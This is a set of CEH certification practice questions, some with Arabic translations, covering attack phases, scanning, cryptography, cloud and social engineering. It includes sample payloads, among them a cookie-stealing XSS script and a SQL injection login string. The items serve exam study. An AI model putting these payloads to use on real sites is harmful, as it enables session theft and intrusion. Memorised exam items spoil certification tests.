CEH Questions Part (5)

At what stage of the cyber kill chain theory model does data exfiltration occur?

 

في أي مرحلة من نماذج نظرية سلسلة القتل السيبرانية يحدث إستخراج البيانات؟

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext.
Which file do you have to clean to clear the password?

 

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?

 

تعد إصابة نظام ببرامج ضارة واستخدام التصيد الاحتيالي للحصول على بيانات اعتماد لنظام أو تطبيق ويب أمثلة على أي مرحلة من منهجية القرصنة الأخلاقية؟

John is investigating web-application firewall logs and observers that someone is attempting to inject the following:
char buff[10];
buff[10] = ‘a’;
What type of attack is this?

 

ما نوع هذا الهجوم؟

Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities.
What will you call these issues?

 

Which file is a rich target to discover the structure of a website during web-server footprinting?

 

ما الملف الذي يعد هدفًا غنيًا لاكتشاف بنية موقع الويب أثناء جمع معلومات عن خادم الويب؟

What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?

 

ما هو الاسم الشائع لبرنامج الكشف عن الثغرات الأمنية الذي تفتحه الشركات في منصات مثل HackerOne؟

There are multiple cloud deployment options depending on how isolated a customer’s resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment.
What is this cloud deployment option called?

 

هناك خيارات متعددة لنشر الشبكات وفقا لمدى عزل موارد العميل عن موارد العملاء الآخرين. تتشارك البيئات المشتركة في التكاليف وتسمح لكل عميل بالتمتع بعمليات أقل. يتمثل أحد الحلول في انضمام العميل إلى مجموعة من المستخدمين أو المؤسسات لمشاركة بيئة مجموعة من الشبكات.

ما اسم خيار نشر المجموعة هذا؟

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network.
Which of the following host discovery techniques must he use to perform the given task?

 

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware.
Which of the following tools must the organization employ to protect its critical infrastructure?

 

 

Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane promptly replied positively. Ralph entered Jane’s company using this opportunity and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins.
What is the type of attack technique Ralph used on Jane?

 

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates.
Which of the following protocols is used by Bella?

 

وجدت Bella ، وهي خبيرة أمنية تعمل في شركة لتكنولوجيا المعلومات ، حدوث خرق أمني أثناء نقل الملفات المهمة. تتم مشاركة البيانات الحساسة وأسماء المستخدمين وكلمات المرور في نص عادي ، مما يمهد الطريق للمتسللين لإجراء عملية اختطاف ناجحة للجلسات. لمعالجة هذا الموقف ، نفذت Bella بروتوكولًا يرسل البيانات باستخدام التشفير والشهادات الرقمية.

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any nonwhitelisted programs.
What type of malware did the attacker use to bypass the company’s application whitelisting?

 

Kevin, a professional hacker, wants to penetrate CyberTech Inc’s network. He employed a technique, using which he encoded packets with Unicode characters. The company’s IDS cannot recognize the packets, but the target web server can decode them.
What is the technique used by Kevin to evade the IDS system?

 

To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core components of the operating system. What is this type of rootkit an example of?

 

للحفاظ على الوصول إلى جهاز بشكل غير مرئي ، يستخدم المهاجم مجموعة أدوات جذرية غير مكتشفة في المكونات الأساسية لنظام التشغيل. ما هو هذا النوع من الجذور الخفية كمثال؟

Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?

 

أي من عناصر التحكم في أمان المعلومات التالية يخلق بيئة منعزلة جذابة للمتسللين لمنعهم من اختراق الأهداف الحرجة أثناء جمع المعلومات حول المخترق في الوقت نفسه؟

Jim, a professional hacker, targeted an organization that is operating critical industrial infrastructure. Jim used Nmap to scan open ports and running services on systems connected to the organization’s OT network. He used an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered information such as the vendor name, product code and name, device name, and IP address.
Which of the following Nmap commands helped Jim retrieve the required information?

 

In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?

 

في هذا الشكل من خوارزمية التشفير ، تحتوي كل كتلة فردية على بيانات 64 بت ، ويتم استخدام ثلاثة مفاتيح ، حيث يتكون كل مفتاح من 56 بت. ما هي خوارزمية التشفير هذه؟

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?

 

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about DNS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?

 

Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, Clark gains access to Steven’s iPhone through the infected computer and is able to monitor and read all of Steven’s activity on the iPhone, even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in the above scenario?

 

أي من الهجمات التالية ينفذها كلارك في السيناريو أعلاه؟

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique, John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server.
What is the technique employed by John to bypass the firewall?

 

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries.
Which of the following tiers of the container technology architecture is Abel currently working in?

 

يستخدم Abel، وهو مهندس شبكات، تقنية الحاوية لنشر التطبيقات/البرامج بما في ذلك كافة تبعياتها، مثل المكتبات وملفات التكوين والثنائيات والموارد الأخرى التي تعمل بشكل مستقل عن العمليات الأخرى في بيئة الشبكات. وبالنسبة لتجهيز التطبيقات بحاويات، يتبع هيكل تكنولوجيا الحاويات المكون من خمسة مستويات. حاليا، يقوم Abel بالتحقق من صحة محتويات الصورة، وتوقيع الصور، وإرسالها إلى السجلات.

أي من الطبقات التالية في بنية تكنولوجيا الحاويات يعمل آبل حاليا فيها؟

Taylor, a security professional, uses a tool to monitor her company’s website, analyze the website’s traffic, and track the geographical location of the users visiting the company’s website.
Which of the following tools did Taylor employ in the above scenario?

 

Attacker Rony installed a rogue access point within an organization’s perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack.
What is the type of vulnerability assessment performed by Johnson in the above scenario?

 

You start performing a penetration test against a specific website and have decided to start from grabbing all the links from the main page.
What is the best Linux pipe to achieve your milestone?

 

Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider. In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?

 

يعمل Joe كمسؤول تكنولوجيا المعلومات في إحدى المؤسسات وقام مؤخرًا بإعداد خدمة الحوسبة السحابية للمؤسسة. لتنفيذ هذه الخدمة ، قام بالتواصل مع شركة اتصالات لتوفير الاتصال بالإنترنت وخدمات النقل بين المؤسسة ومزود الخدمة السحابية. في البنية المرجعية لنشر سحابة NIST ، ما هي الفئة التي تندرج تحتها شركة الاتصالات في السيناريو أعلاه؟

A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior to the intrusion. This is likely a failure in which of the following security processes?

 

كشف تحقيق جنائي بعد الاختراق أن ثغرة معروفة في Apache Struts كانت مسؤولة عن خرق بيانات Equifax الذي أثر على 143 مليون عميل. كان الإصلاح متاحًا من بائع البرنامج لعدة أشهر قبل الاقتحام. من المحتمل أن يكون هذا إخفاقًا في أي من عمليات الأمان التالية؟

Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app.
What is the attack performed on Don in the above scenario?

 

دون، طالب، صادف تطبيقا للألعاب في متجر تطبيقات الطرف الثالث وقام بتثبيته. وفي وقت لاحق، استبدلت كل التطبيقات المشروعة في هاتفه الذكي بتطبيقات مخادعة بدت مشروعة. كما تلقى إعلانات كثيرة على هاتفه الذكي بعد تثبيت التطبيق. ما هو الهجوم الذي تعرض له دون في السيناريو المذكور آنفا؟

This form of encryption algorithm is a symmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption
algorithm?

 

هذا الشكل من خوارزمية التشفير عبارة عن تشفير كتلة مفتاح متماثل يتميز بحجم كتلة 128 بت ، ويمكن أن يصل حجم مفتاحه إلى 256 بت. أي من الخوارزمية التالية هي خوارزمية التشفير هذه؟

Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs.
Which two SQL injection types would give her the results she is looking for?

 

Judy created a forum. One day, she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script>
document.write(‘<img.src=“https://localhost/submitcookie.php? cookie =’+
escape(document.cookie) +”’ />);
</script>
What issue occurred for the users who clicked on the image?

 

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials:
Username: attack’ or 1=1 –
Password: 123456
Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?

 

A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his computer.
What tests would you perform to determine whether his computer is infected?

 

يخبرك صديق لك أنه قام بتنزيل وتنفيذ ملف أرسله إليه زميل في العمل. نظرًا لأن الملف لم يفعل شيئًا عند تشغيله ، فإنه يطلب منك المساعدة لأنه يشتبه في أنه ربما قام بتثبيت حصان طروادة على جهاز الكمبيوتر الخاص به.

An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?

 

يقوم المهاجم بإعادة توجيه الضحية إلى مواقع ويب ضارة عن طريق إرسال رابط ضار لهم عبر البريد الإلكتروني. يبدو الرابط أصليًا ولكنه يعيد توجيه الضحية إلى صفحة ويب ضارة ، مما يسمح للمهاجم بسرقة بيانات الضحية. ما نوع هذا الهجوم؟

A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete.
Which attack is being described here?

 

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session ID to the target employee. The session ID links the target employee to Boney’s account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boney’s account.
What is the attack performed by Boney in the above scenario?

 

Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the integrity of updating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.
What is the type of web-service API mentioned in the above scenario?

 

Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.moviescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as “’or ‘1’=‘1’” in any basic injection statement such as “or 1=1.” Identify the evasion technique used by Daniel in the above scenario.

 

دانيال هو متسلل محترف يحاول تنفيذ هجوم حقن SQL على موقع ويب مستهدف ، www.moviescope.com. خلال هذه العملية ، واجه IDS الذي يكتشف محاولات حقن SQL بناءً على تواقيع محددة مسبقًا. لتجنب أي بيان مقارنة ، حاول وضع أحرف مثل "" أو "1" = "1" في أي عبارة حقن أساسية مثل "أو 1 = 1". حدد أسلوب المراوغة الذي استخدمه دانيال في السيناريو أعلاه.

Jane, an ethical hacker, is testing a target organization’s web server and website to identify security loopholes. In this process, she copied the entire website and its content on a local drive to view the complete profile of the site’s directory structure, file structure, external links, images, web pages, and so on. This information helps Jane map the website’s directories and gain valuable information.
What is the attack technique employed by Jane in the above scenario?

 

Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with him soon after accepting the request. After a few days, Steve started asking about her company details and eventually gathered all the essential information regarding her company.
What is the social engineering technique Steve employed in the above scenario?

 

Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______________ to encrypt the message, and Bryan uses _______________ to confirm the digital signature.

 

تحتاج أليس إلى إرسال مستند سري إلى زميلها في العمل ، برايان. تمتلك شركتهم البنية التحتية للمفتاح العام. لذلك ، تقوم أليس بتشفير الرسالة وتوقيعها رقميًا. تستخدم أليس _______________ لتشفير الرسالة ، ويستخدم Bryan _______________ لتأكيد التوقيع الرقمي.

Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob’s connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob.
What is the type of attack performed by Samuel in the above scenario?

 

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?

 

إذا قمت بإرسال مقطع TCP ACK إلى منفذ مغلق معروف على جدار حماية ولكنه لا يستجيب لـ RST ، فما الذي تعرفه عن جدار الحماية الذي تقوم بفحصه؟

Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.
What is the APT lifecycle phase that Harry is currently executing?

 

In the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium vulnerability fall in?

 

في تصنيفات الشدة لنظام نقاط الضعف المشترك (CVSS) v3.1 ، ما هو النطاق الذي تقع فيه الثغرات الأمنية المتوسطة؟

While browsing his Facebook feed, Matt sees a picture one of his friends posted with the caption, “Learn more about your friends!”, as well as a number of personal questions. Matt is suspicious and texts his friend, who confirms that he did indeed post it. With assurance that the post is legitimate, Matt responds to the questions on the post. A few days later, Matt’s bank account has been accessed, and the password has been changed.
What most likely happened?

 

Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which of the following ports should Robin run the NSTX tool?

 

يحاول أحد المهاجمين Robin تجاوز جدران الحماية الخاصة بمؤسسة ما من خلال طريقة نفق DNS لاستخراج البيانات. إنه يستخدم أداة NSTX لتجاوز جدران الحماية. على أي من المنافذ التالية يجب على Robin تشغيل أداة NSTX؟

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?

 

ما هو الملف الذي يحدد التكوين الأساسي (تحديدًا الأنشطة والخدمات وأجهزة استقبال البث وما إلى ذلك) في تطبيق Android؟